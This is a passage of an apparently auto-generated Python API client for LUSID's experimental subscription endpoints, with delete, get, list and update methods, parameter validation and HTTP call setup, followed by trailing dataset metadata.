        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats,
        _request_auth=local_var_params.get('_request_auth'))
def delete_subscription(self, scope, code, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] DeleteSubscription: Delete a subscription.  # noqa: E501

    Convenience wrapper around :meth:`delete_subscription_with_http_info`
    that returns only the response payload (no status code or headers).
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.delete_subscription(scope, code, async_req=True)
    >>> result = thread.get()

    :param scope: The scope that identifies a subscription (required)
    :type scope: str
    :param code: The code that identifies a subscription (required)
    :type code: str
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: Returns the result object. If the method is called
             asynchronously, returns the request thread.
    :rtype: None
    """
    # Force data-only mode, then delegate everything else to the
    # *_with_http_info variant.
    params = dict(kwargs, _return_http_data_only=True)
    return self.delete_subscription_with_http_info(scope, code, **params)  # noqa: E501
def delete_subscription_with_http_info(self, scope, code, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] DeleteSubscription: Delete a subscription.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.delete_subscription_with_http_info(scope, code, async_req=True)
    >>> result = thread.get()

    :param scope: The scope that identifies a subscription (required)
    :type scope: str
    :param code: The code that identifies a subscription (required)
    :type code: str
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: response data without head status code
                                   and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :param _request_auth: set to override the auth_settings for an a single
                          request; this effectively ignores the authentication
                          in the spec for a single request.
    :type _request_auth: dict, optional
    :return: Returns the result object.
             If the method is called asynchronously,
             returns the request thread.
    :rtype: None
    """
    # locals() must be the very first statement: it captures exactly the
    # declared parameters plus the raw ``kwargs`` dict, before any other
    # local name is bound.
    local_var_params = locals()

    all_params = [
        'scope',
        'code'
    ]
    all_params.extend(
        [
            'async_req',
            '_return_http_data_only',
            '_preload_content',
            '_request_timeout',
            '_request_auth'
        ]
    )

    # Reject unknown keyword arguments; flatten accepted ones so every
    # parameter can be looked up uniformly in ``local_var_params``.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_subscription" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']

    # verify the required parameter 'scope' is set
    if self.api_client.client_side_validation and ('scope' not in local_var_params or  # noqa: E501
                                                   local_var_params['scope'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `scope` when calling `delete_subscription`")  # noqa: E501
    # verify the required parameter 'code' is set
    if self.api_client.client_side_validation and ('code' not in local_var_params or  # noqa: E501
                                                   local_var_params['code'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `code` when calling `delete_subscription`")  # noqa: E501

    # Client-side constraint checks mirroring the OpenAPI spec: scope and
    # code are 1-64 characters from [a-zA-Z0-9-_].  Messages containing
    # backslashes are raw literals; the generated originals used plain
    # strings with invalid escape sequences such as `\-` (SyntaxWarning
    # from Python 3.12 onwards).
    if self.api_client.client_side_validation and ('scope' in local_var_params and  # noqa: E501
                                                   len(local_var_params['scope']) > 64):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `scope` when calling `delete_subscription`, length must be less than or equal to `64`")  # noqa: E501
    if self.api_client.client_side_validation and ('scope' in local_var_params and  # noqa: E501
                                                   len(local_var_params['scope']) < 1):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `scope` when calling `delete_subscription`, length must be greater than or equal to `1`")  # noqa: E501
    if self.api_client.client_side_validation and 'scope' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['scope']):  # noqa: E501
        raise ApiValueError(r"Invalid value for parameter `scope` when calling `delete_subscription`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`")  # noqa: E501
    if self.api_client.client_side_validation and ('code' in local_var_params and  # noqa: E501
                                                   len(local_var_params['code']) > 64):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `code` when calling `delete_subscription`, length must be less than or equal to `64`")  # noqa: E501
    if self.api_client.client_side_validation and ('code' in local_var_params and  # noqa: E501
                                                   len(local_var_params['code']) < 1):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `code` when calling `delete_subscription`, length must be greater than or equal to `1`")  # noqa: E501
    if self.api_client.client_side_validation and 'code' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['code']):  # noqa: E501
        raise ApiValueError(r"Invalid value for parameter `code` when calling `delete_subscription`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`")  # noqa: E501

    collection_formats = {}

    # Path parameters are substituted into '/api/subscriptions/{scope}/{code}'.
    path_params = {}
    if 'scope' in local_var_params:
        path_params['scope'] = local_var_params['scope']  # noqa: E501
    if 'code' in local_var_params:
        path_params['code'] = local_var_params['code']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    header_params['Accept-Encoding'] = "gzip, deflate, br"

    # Authentication setting
    auth_settings = ['oauth2']  # noqa: E501

    # DELETE returns no typed payload, hence the empty map.
    response_types_map = {}

    return self.api_client.call_api(
        '/api/subscriptions/{scope}/{code}', 'DELETE',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_types_map=response_types_map,
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats,
        _request_auth=local_var_params.get('_request_auth'))
def get_subscription(self, scope, code, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] GetSubscription: Get a subscription.  # noqa: E501

    Convenience wrapper around :meth:`get_subscription_with_http_info`
    that returns only the response payload (no status code or headers).
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_subscription(scope, code, async_req=True)
    >>> result = thread.get()

    :param scope: The scope that identifies a subscription (required)
    :type scope: str
    :param code: The code that identifies a subscription (required)
    :type code: str
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: Returns the result object. If the method is called
             asynchronously, returns the request thread.
    :rtype: SubscriptionDetail
    """
    # Force data-only mode, then delegate everything else to the
    # *_with_http_info variant.
    params = dict(kwargs, _return_http_data_only=True)
    return self.get_subscription_with_http_info(scope, code, **params)  # noqa: E501
def get_subscription_with_http_info(self, scope, code, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] GetSubscription: Get a subscription.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_subscription_with_http_info(scope, code, async_req=True)
    >>> result = thread.get()

    :param scope: The scope that identifies a subscription (required)
    :type scope: str
    :param code: The code that identifies a subscription (required)
    :type code: str
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: response data without head status code
                                   and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :param _request_auth: set to override the auth_settings for an a single
                          request; this effectively ignores the authentication
                          in the spec for a single request.
    :type _request_auth: dict, optional
    :return: Returns the result object.
             If the method is called asynchronously,
             returns the request thread.
    :rtype: tuple(SubscriptionDetail, status_code(int), headers(HTTPHeaderDict))
    """
    # locals() must be the very first statement: it captures exactly the
    # declared parameters plus the raw ``kwargs`` dict, before any other
    # local name is bound.
    local_var_params = locals()

    all_params = [
        'scope',
        'code'
    ]
    all_params.extend(
        [
            'async_req',
            '_return_http_data_only',
            '_preload_content',
            '_request_timeout',
            '_request_auth'
        ]
    )

    # Reject unknown keyword arguments; flatten accepted ones so every
    # parameter can be looked up uniformly in ``local_var_params``.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_subscription" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']

    # verify the required parameter 'scope' is set
    if self.api_client.client_side_validation and ('scope' not in local_var_params or  # noqa: E501
                                                   local_var_params['scope'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `scope` when calling `get_subscription`")  # noqa: E501
    # verify the required parameter 'code' is set
    if self.api_client.client_side_validation and ('code' not in local_var_params or  # noqa: E501
                                                   local_var_params['code'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `code` when calling `get_subscription`")  # noqa: E501

    # Client-side constraint checks mirroring the OpenAPI spec: scope and
    # code are 1-64 characters from [a-zA-Z0-9-_].  Messages containing
    # backslashes are raw literals; the generated originals used plain
    # strings with invalid escape sequences such as `\-` (SyntaxWarning
    # from Python 3.12 onwards).
    if self.api_client.client_side_validation and ('scope' in local_var_params and  # noqa: E501
                                                   len(local_var_params['scope']) > 64):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `scope` when calling `get_subscription`, length must be less than or equal to `64`")  # noqa: E501
    if self.api_client.client_side_validation and ('scope' in local_var_params and  # noqa: E501
                                                   len(local_var_params['scope']) < 1):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `scope` when calling `get_subscription`, length must be greater than or equal to `1`")  # noqa: E501
    if self.api_client.client_side_validation and 'scope' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['scope']):  # noqa: E501
        raise ApiValueError(r"Invalid value for parameter `scope` when calling `get_subscription`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`")  # noqa: E501
    if self.api_client.client_side_validation and ('code' in local_var_params and  # noqa: E501
                                                   len(local_var_params['code']) > 64):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `code` when calling `get_subscription`, length must be less than or equal to `64`")  # noqa: E501
    if self.api_client.client_side_validation and ('code' in local_var_params and  # noqa: E501
                                                   len(local_var_params['code']) < 1):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `code` when calling `get_subscription`, length must be greater than or equal to `1`")  # noqa: E501
    if self.api_client.client_side_validation and 'code' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['code']):  # noqa: E501
        raise ApiValueError(r"Invalid value for parameter `code` when calling `get_subscription`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`")  # noqa: E501

    collection_formats = {}

    # Path parameters are substituted into '/api/subscriptions/{scope}/{code}'.
    path_params = {}
    if 'scope' in local_var_params:
        path_params['scope'] = local_var_params['scope']  # noqa: E501
    if 'code' in local_var_params:
        path_params['code'] = local_var_params['code']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    header_params['Accept-Encoding'] = "gzip, deflate, br"

    # Authentication setting
    auth_settings = ['oauth2']  # noqa: E501

    response_types_map = {
        200: "SubscriptionDetail",
        400: "LusidValidationProblemDetails",
        404: "str",
    }

    return self.api_client.call_api(
        '/api/subscriptions/{scope}/{code}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_types_map=response_types_map,
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats,
        _request_auth=local_var_params.get('_request_auth'))
def list_subscriptions(self, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] ListSubscriptions: List subscriptions.  # noqa: E501

    Convenience wrapper around :meth:`list_subscriptions_with_http_info`
    that returns only the response payload (no status code or headers).
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.list_subscriptions(async_req=True)
    >>> result = thread.get()

    :param filter: Expression to filter the result set. Read more about <see href=\"https://support.lusid.com/filtering-results-from-lusid\"> filtering results from LUSID</see>.
    :type filter: str
    :param sort_by: Fields to order the result set. Read more about <see href=\"https://support.lusid.com/filtering-results-from-lusid\" /> filtering results from LUSID.
    :type sort_by: str
    :param page: Encoded page string returned from a previous search result that will retrieve the next page of data. When this field is supplied the filter field should not be supplied.
    :type page: str
    :param limit: The maximum number of subscriptions to retrieve.
    :type limit: int
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: Returns the result object. If the method is called
             asynchronously, returns the request thread.
    :rtype: ResourceListOfSubscription
    """
    # Force data-only mode, then delegate everything else to the
    # *_with_http_info variant.
    params = dict(kwargs, _return_http_data_only=True)
    return self.list_subscriptions_with_http_info(**params)  # noqa: E501
def list_subscriptions_with_http_info(self, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] ListSubscriptions: List subscriptions.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.list_subscriptions_with_http_info(async_req=True)
    >>> result = thread.get()

    :param filter: Expression to filter the result set. Read more about <see href=\"https://support.lusid.com/filtering-results-from-lusid\"> filtering results from LUSID</see>.
    :type filter: str
    :param sort_by: Fields to order the result set. Read more about <see href=\"https://support.lusid.com/filtering-results-from-lusid\" /> filtering results from LUSID.
    :type sort_by: str
    :param page: Encoded page string returned from a previous search result that will retrieve the next page of data. When this field is supplied the filter field should not be supplied.
    :type page: str
    :param limit: The maximum number of subscriptions to retrieve.
    :type limit: int
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: response data without head status code
                                   and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :param _request_auth: set to override the auth_settings for an a single
                          request; this effectively ignores the authentication
                          in the spec for a single request.
    :type _request_auth: dict, optional
    :return: Returns the result object.
             If the method is called asynchronously,
             returns the request thread.
    :rtype: tuple(ResourceListOfSubscription, status_code(int), headers(HTTPHeaderDict))
    """
    # locals() must be the very first statement: it captures ``self`` plus
    # the raw ``kwargs`` dict, before any other local name is bound.
    local_var_params = locals()

    all_params = [
        'filter',
        'sort_by',
        'page',
        'limit'
    ]
    all_params.extend(
        [
            'async_req',
            '_return_http_data_only',
            '_preload_content',
            '_request_timeout',
            '_request_auth'
        ]
    )

    # Reject unknown keyword arguments; flatten accepted ones so every
    # parameter can be looked up uniformly in ``local_var_params``.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method list_subscriptions" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']

    # Client-side constraint checks mirroring the OpenAPI spec.  Messages
    # containing backslashes are raw literals; the generated originals
    # used plain strings with invalid escape sequences such as `\s` and
    # `\+` (SyntaxWarning from Python 3.12 onwards).
    if self.api_client.client_side_validation and ('filter' in local_var_params and  # noqa: E501
                                                   len(local_var_params['filter']) > 16384):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `filter` when calling `list_subscriptions`, length must be less than or equal to `16384`")  # noqa: E501
    if self.api_client.client_side_validation and ('filter' in local_var_params and  # noqa: E501
                                                   len(local_var_params['filter']) < 0):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `filter` when calling `list_subscriptions`, length must be greater than or equal to `0`")  # noqa: E501
    if self.api_client.client_side_validation and 'filter' in local_var_params and not re.search(r'^[\s\S]*$', local_var_params['filter']):  # noqa: E501
        raise ApiValueError(r"Invalid value for parameter `filter` when calling `list_subscriptions`, must conform to the pattern `/^[\s\S]*$/`")  # noqa: E501
    if self.api_client.client_side_validation and ('sort_by' in local_var_params and  # noqa: E501
                                                   len(local_var_params['sort_by']) > 16384):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `sort_by` when calling `list_subscriptions`, length must be less than or equal to `16384`")  # noqa: E501
    if self.api_client.client_side_validation and ('sort_by' in local_var_params and  # noqa: E501
                                                   len(local_var_params['sort_by']) < 1):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `sort_by` when calling `list_subscriptions`, length must be greater than or equal to `1`")  # noqa: E501
    if self.api_client.client_side_validation and 'sort_by' in local_var_params and not re.search(r'^[\s\S]*$', local_var_params['sort_by']):  # noqa: E501
        raise ApiValueError(r"Invalid value for parameter `sort_by` when calling `list_subscriptions`, must conform to the pattern `/^[\s\S]*$/`")  # noqa: E501
    if self.api_client.client_side_validation and ('page' in local_var_params and  # noqa: E501
                                                   len(local_var_params['page']) > 500):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `page` when calling `list_subscriptions`, length must be less than or equal to `500`")  # noqa: E501
    if self.api_client.client_side_validation and ('page' in local_var_params and  # noqa: E501
                                                   len(local_var_params['page']) < 1):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `page` when calling `list_subscriptions`, length must be greater than or equal to `1`")  # noqa: E501
    if self.api_client.client_side_validation and 'page' in local_var_params and not re.search(r'^[a-zA-Z0-9\+\/]*={0,3}$', local_var_params['page']):  # noqa: E501
        raise ApiValueError(r"Invalid value for parameter `page` when calling `list_subscriptions`, must conform to the pattern `/^[a-zA-Z0-9\+\/]*={0,3}$/`")  # noqa: E501
    if self.api_client.client_side_validation and 'limit' in local_var_params and local_var_params['limit'] > 5000:  # noqa: E501
        raise ApiValueError("Invalid value for parameter `limit` when calling `list_subscriptions`, must be a value less than or equal to `5000`")  # noqa: E501
    if self.api_client.client_side_validation and 'limit' in local_var_params and local_var_params['limit'] < 1:  # noqa: E501
        raise ApiValueError("Invalid value for parameter `limit` when calling `list_subscriptions`, must be a value greater than or equal to `1`")  # noqa: E501

    collection_formats = {}

    path_params = {}

    # Optional query parameters; note the snake_case -> camelCase rename
    # for sort_by.
    query_params = []
    if 'filter' in local_var_params and local_var_params['filter'] is not None:  # noqa: E501
        query_params.append(('filter', local_var_params['filter']))  # noqa: E501
    if 'sort_by' in local_var_params and local_var_params['sort_by'] is not None:  # noqa: E501
        query_params.append(('sortBy', local_var_params['sort_by']))  # noqa: E501
    if 'page' in local_var_params and local_var_params['page'] is not None:  # noqa: E501
        query_params.append(('page', local_var_params['page']))  # noqa: E501
    if 'limit' in local_var_params and local_var_params['limit'] is not None:  # noqa: E501
        query_params.append(('limit', local_var_params['limit']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    header_params['Accept-Encoding'] = "gzip, deflate, br"

    # Authentication setting
    auth_settings = ['oauth2']  # noqa: E501

    response_types_map = {
        200: "ResourceListOfSubscription",
        400: "LusidValidationProblemDetails",
    }

    return self.api_client.call_api(
        '/api/subscriptions', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_types_map=response_types_map,
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats,
        _request_auth=local_var_params.get('_request_auth'))
def update_subscription(self, scope, code, update_subscription, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] UpdateSubscription: Update an existing subscription.  # noqa: E501

    Convenience wrapper around :meth:`update_subscription_with_http_info`
    that returns only the response payload (no status code or headers).
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.update_subscription(scope, code, update_subscription, async_req=True)
    >>> result = thread.get()

    :param scope: The scope that identifies a subscription (required)
    :type scope: str
    :param code: The code that identifies a subscription (required)
    :type code: str
    :param update_subscription: The data to update a subscription (required)
    :type update_subscription: UpdateSubscription
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: Returns the result object. If the method is called
             asynchronously, returns the request thread.
    :rtype: Subscription
    """
    # Force data-only mode, then delegate everything else to the
    # *_with_http_info variant.
    params = dict(kwargs, _return_http_data_only=True)
    return self.update_subscription_with_http_info(scope, code, update_subscription, **params)  # noqa: E501
def update_subscription_with_http_info(self, scope, code, update_subscription, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] UpdateSubscription: Update an existing subscription.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.update_subscription_with_http_info(scope, code, update_subscription, async_req=True)
    >>> result = thread.get()

    :param scope: The scope that identifies a subscription (required)
    :type scope: str
    :param code: The code that identifies a subscription (required)
    :type code: str
    :param update_subscription: The data to update a subscription (required)
    :type update_subscription: UpdateSubscription
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: response data without head status code
                                   and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :param _request_auth: set to override the auth_settings for an a single
                          request; this effectively ignores the authentication
                          in the spec for a single request.
    :type _request_auth: dict, optional
    :return: Returns the result object.
             If the method is called asynchronously,
             returns the request thread.
    :rtype: tuple(Subscription, status_code(int), headers(HTTPHeaderDict))
    """
    # locals() must be the very first statement: it captures exactly the
    # declared parameters plus the raw ``kwargs`` dict, before any other
    # local name is bound.
    local_var_params = locals()

    all_params = [
        'scope',
        'code',
        'update_subscription'
    ]
    all_params.extend(
        [
            'async_req',
            '_return_http_data_only',
            '_preload_content',
            '_request_timeout',
            '_request_auth'
        ]
    )

    # Reject unknown keyword arguments; flatten accepted ones so every
    # parameter can be looked up uniformly in ``local_var_params``.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_subscription" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']

    # verify the required parameter 'scope' is set
    if self.api_client.client_side_validation and ('scope' not in local_var_params or  # noqa: E501
                                                   local_var_params['scope'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `scope` when calling `update_subscription`")  # noqa: E501
    # verify the required parameter 'code' is set
    if self.api_client.client_side_validation and ('code' not in local_var_params or  # noqa: E501
                                                   local_var_params['code'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `code` when calling `update_subscription`")  # noqa: E501
    # verify the required parameter 'update_subscription' is set
    if self.api_client.client_side_validation and ('update_subscription' not in local_var_params or  # noqa: E501
                                                   local_var_params['update_subscription'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `update_subscription` when calling `update_subscription`")  # noqa: E501

    # Client-side constraint checks mirroring the OpenAPI spec: scope and
    # code are 1-64 characters from [a-zA-Z0-9-_].  Messages containing
    # backslashes are raw literals; the generated originals used plain
    # strings with invalid escape sequences such as `\-` (SyntaxWarning
    # from Python 3.12 onwards).
    if self.api_client.client_side_validation and ('scope' in local_var_params and  # noqa: E501
                                                   len(local_var_params['scope']) > 64):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `scope` when calling `update_subscription`, length must be less than or equal to `64`")  # noqa: E501
    if self.api_client.client_side_validation and ('scope' in local_var_params and  # noqa: E501
                                                   len(local_var_params['scope']) < 1):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `scope` when calling `update_subscription`, length must be greater than or equal to `1`")  # noqa: E501
    if self.api_client.client_side_validation and 'scope' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['scope']):  # noqa: E501
        raise ApiValueError(r"Invalid value for parameter `scope` when calling `update_subscription`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`")  # noqa: E501
    if self.api_client.client_side_validation and ('code' in local_var_params and  # noqa: E501
                                                   len(local_var_params['code']) > 64):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `code` when calling `update_subscription`, length must be less than or equal to `64`")  # noqa: E501
    if self.api_client.client_side_validation and ('code' in local_var_params and  # noqa: E501
                                                   len(local_var_params['code']) < 1):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `code` when calling `update_subscription`, length must be greater than or equal to `1`")  # noqa: E501
    if self.api_client.client_side_validation and 'code' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['code']):  # noqa: E501
        raise ApiValueError(r"Invalid value for parameter `code` when calling `update_subscription`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`")  # noqa: E501

    collection_formats = {}

    # Path parameters are substituted into '/api/subscriptions/{scope}/{code}'.
    path_params = {}
    if 'scope' in local_var_params:
        path_params['scope'] = local_var_params['scope']  # noqa: E501
    if 'code' in local_var_params:
        path_params['code'] = local_var_params['code']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    # The request body is the UpdateSubscription payload.
    body_params = None
    if 'update_subscription' in local_var_params:
        body_params = local_var_params['update_subscription']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    header_params['Accept-Encoding'] = "gzip, deflate, br"

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json-patch+json', 'application/json', 'text/json', 'application/*+json'])  # noqa: E501

    # set the LUSID header
    header_params['X-LUSID-SDK-Language'] = 'Python'
    header_params['X-LUSID-SDK-Version'] = '0.1.317'

    # Authentication setting
    auth_settings = ['oauth2']  # noqa: E501

    response_types_map = {
        200: "Subscription",
        400: "LusidValidationProblemDetails",
        404: "str",
    }

    return self.api_client.call_api(
        '/api/subscriptions/{scope}/{code}', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_types_map=response_types_map,
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats,
        _request_auth=local_var_params.get('_request_auth'))
| 53.374282
| 191
| 0.609951
| 5,329
| 46,489
| 5.103397
| 0.048977
| 0.046772
| 0.075673
| 0.028828
| 0.962053
| 0.953596
| 0.948926
| 0.943521
| 0.926055
| 0.921974
| 0
| 0.020422
| 0.309019
| 46,489
| 870
| 192
| 53.435632
| 0.826199
| 0.385532
| 0
| 0.668213
| 1
| 0.067285
| 0.268787
| 0.056179
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025522
| false
| 0
| 0.011601
| 0
| 0.062645
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
106b02c16977d1853f13ed3c80519c371f0c4234
| 13,880
|
py
|
Python
|
tests/test_activity_recognition_feedback.py
|
darpa-sail-on/sail-on-client
|
1fd7c0ec359469040fd7af0c8e56fe53277d4a27
|
[
"Apache-2.0"
] | 1
|
2021-04-12T17:20:54.000Z
|
2021-04-12T17:20:54.000Z
|
tests/test_activity_recognition_feedback.py
|
darpa-sail-on/sail-on-client
|
1fd7c0ec359469040fd7af0c8e56fe53277d4a27
|
[
"Apache-2.0"
] | 92
|
2021-03-08T22:32:15.000Z
|
2022-03-25T03:53:01.000Z
|
tests/test_activity_recognition_feedback.py
|
darpa-sail-on/sail-on-client
|
1fd7c0ec359469040fd7af0c8e56fe53277d4a27
|
[
"Apache-2.0"
] | null | null | null |
